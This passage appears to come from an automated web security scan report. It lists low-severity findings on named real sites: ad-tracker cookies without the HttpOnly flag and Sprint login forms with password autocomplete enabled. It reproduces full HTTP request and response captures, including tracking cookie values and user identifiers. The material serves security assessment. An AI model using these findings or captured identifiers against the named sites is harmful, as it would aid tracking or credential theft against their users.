uto%29;domesticNews|Text|13483695_Related%20Topics&ModImp=1&VBC=cfa&ContentType=Text&ContentID=USTRE78222D20110904&ContentChannel=domesticNews&ContentID_domesticNews=USTRE78222D20110904&ContentHeadline=Notre%2BDame%2C%2BMichigan%2Bstadiums%2Bcleared%2Bdue%2Bto%2Bstorms&PageNumber=1&PageTotal=1&rChannel=News&rCountry=BETAUS&DartZone=us.reuters/news/us/article HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAIAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAM3JYk7NyWJOBAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADNyWJOzcliTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 00:58:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAIAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAADjNYk7NyWJOBAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAAA4zWJOzcliTgAAAAA-; path=/; expires=Wed, 01-Sep-2021 00:58:32 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

12.71. http://sync.adap.tv/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?type=gif&key=turn&uid=2925993182975414771 HTTP/1.1
Host: sync.adap.tv
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A44%3A51+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A59"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A57%3A27+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:44:07 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

12.72. http://sync.mathtag.com/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3c 32572
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 00:55:52 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315097752; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:55:52 GMT
Content-Length: 0


12.73. http://syndication.mmismm.com/tntwo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&r=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&t=300?tm=330352 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:33 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=WyBPG2WuR0m9hGPSaL94eQ--; expires=Sat, 03-Sep-2016 07:13:33 GMT; path=/; domain=.mmismm.com
Content-Length: 43
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/javascript

var msegs='';Mindset.handleResponse(msegs);

12.74. http://tacoda.at.atwola.com/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=LCN&si=11684&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:45 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:20:45 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:05:45 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:05:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100145|17778^1315097086^1315098886|11684^1315097306^1315100145; path=/; expires=Sun, 04-Sep-11 01:35:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


12.75. http://tags.bluekai.com/site/4195

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4195

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/4195?id=b6f4436ac614b0358d75&?tm=915580 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACX9O76Byy==; bk=myAUzYJX+9Fze1lp; bkc=KJhnasHQmYdOh1O6vLZwARsO/Hc/UX3J0G2CRRepol9p1nOh1enzwT7QbhG0GwOObZaXBuYt3tPQt9wA16c8RP0Gda96wAQdMcX/S1CbvxSsY3C8/wTbBe8/wRyFOUEFUMTZOoFpzxQIn0o4xGTOCxdueIBdTtaQrY7ehOY6OLWdT1i/y+I1hrXlxKV4PAckmlR0GwOO2LcT7YYdEt5QuYoaX9XtGdn5ske8/OgsUylAq2b10g5rHKVefWrWXQs3akys; bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; bkdc=sf; bklc=4e62ca02

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62d0a8; expires=Tue, 06-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=R+zBw0JX+9Fze1lp; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5ppXnxPWROFe77YEdRf+Jag/jk/tDhVCxEanrn529VjuuyVHHwGsJsm8vRzBQBFAvJGwJKUWbFUzT7UfNFm2pMC1cMZIO8XVruNCyke121n52h+6Wzn1Aon/9FkTsruZFwxXedGe9Tt0znTYjX+G85uoeRcKZFo2q/KbZhpuF4PJn+AkQXB2cl7C1KKtAKrXIJksI5R0MlaRSpeuFdRG928HWRtNX39oZNIBjA4rS8S8myDh2tAcbIyvyIXqc1U5+hWtl2Agj5qknWtf3bdf29EhDj89=; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACXnxf/99T1/x8JjZGZJLPkiLoZCujvOLSkaig7oiQ+J4Q9iBHVZ; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 01:13:12 GMT
Cache-Control: max-age=86400, private
BK-Server: 160f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

12.76. http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxid=01345f4e62cacd40; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Set-Cookie: adxf=696749@1@221; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.77. http://tu.connect.wunderloop.net/TU/1/1/1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tu.connect.wunderloop.net
Path:   /TU/1/1/1/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TU/1/1/1/ HTTP/1.1
Host: tu.connect.wunderloop.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:10 GMT
Server: Apache
P3P: policyref="http://connect.wunderloop.net/w3c/p3p.xml", CP="NOI PSAa PSDa OUR IND UNI CNT"
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Oct 1989 14:06:29 GMT
Last-Modified: Thu, 31 Oct 1989 14:06:29 GMT
Set-Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:48:10 GMT; domain=.wunderloop.net; Path=/
X-Cnection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

12.78. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=reuters.com&pid=501 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
Cache-Control: max-age=0
If-Modified-Since: Thu, 04 Aug 2011 17:51:39 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
If-None-Match: "221d8352905f2c38b3cb2bd191d630b0"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXs4bdFipkUfSaj5XcunNcMDa7Re6IGD4lBvQyxxHPmw0Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQD6vWJNOjnJHrfysIJUvFEEVUJBxdqAyCnhnIK7WDp3tGB8GRrS9YqGZ21tipbuEa4ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 04 Sep 2011 00:48:10 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Set-Cookie: BizoData=Pp1FHRK43ZweORIlfkWqu9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZiiM5m7MKDWeaj5XcunNcMDa7Re6IGD4lFbK4oBwEGr9Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspmIzmbswoNZ5qPldy6c1wwH4DELwm2ipwN9AFjATkbkUDTbwiiAhQOisLU5UVO9T0RLQPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9s3m5pebWcHCAieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Length: 0
Connection: keep-alive


12.79. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /auto/sacbee/CA/Sacramento.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auto/sacbee/CA/Sacramento.html?threeday=1&width=316 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dottag.42=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:55 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-CreationTime: 0.287
Set-Cookie: ASC=1315098655:2; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com
Connection: close
Content-Type: text/html
Content-Length: 1120


<html>
<head>
   <style type="text/css">
       body { font-family: Arial,Helvetica,sans-serif; font-size: 12px; }
       td { font-size: 12px; }
   </style>
</head>
<body>
       <div style="width: 316px;">
       <div cla
...[SNIP]...

13. Password field with autocomplete enabled
There are 10 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


13.1. http://community.sprint.com/baw/community/buzzaboutwireless

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /baw/community/buzzaboutwireless HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:45 GMT
Server: Apache-Coyote/1.1
X-JAL: 186
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130313b31342c323130323b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=346147 t=1315099124916508
Connection: close
Content-Length: 138024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.2. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The page contains a form with the following action URL:
https://mysprint.sprint.com/entrycheck/login.fcc
The form contains the following password field with autocomplete enabled:
<input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/>

Request

GET /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:54 GMT
Server: Apache-Coyote/1.1
X-JAL: 270
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323130313b31342c323130323b31342c323032383b31342c323037333b; Expires=Tue, 04-Oct-2011 01:18:54 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=424084 t=1315099134687160
Connection: close
Content-Length: 156782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.3. http://community.sprint.com/baw/community/sprintblogs

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/sprintblogs

Issue detail

The page contains a form with the following action URL:
https://mysprint.sprint.com/entrycheck/login.fcc
The form contains the following password field with autocomplete enabled:
<input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/>

Request

GET /baw/community/sprintblogs HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:46 GMT
Server: Apache-Coyote/1.1
X-JAL: 95
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130323b31342c323130313b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=222160 t=1315099125905413
Connection: close
Content-Length: 115606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.4. http://community.sprint.com/baw/groups

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/groups

Issue detail

The page contains a form with the following action URL:
https://mysprint.sprint.com/entrycheck/login.fcc
The form contains the following password field with autocomplete enabled:
<input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/>

Request

GET /baw/groups HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:19:01 GMT
Server: Apache-Coyote/1.1
X-JAL: 163
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=310969 t=1315099141159580
Connection: close
Content-Length: 99076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
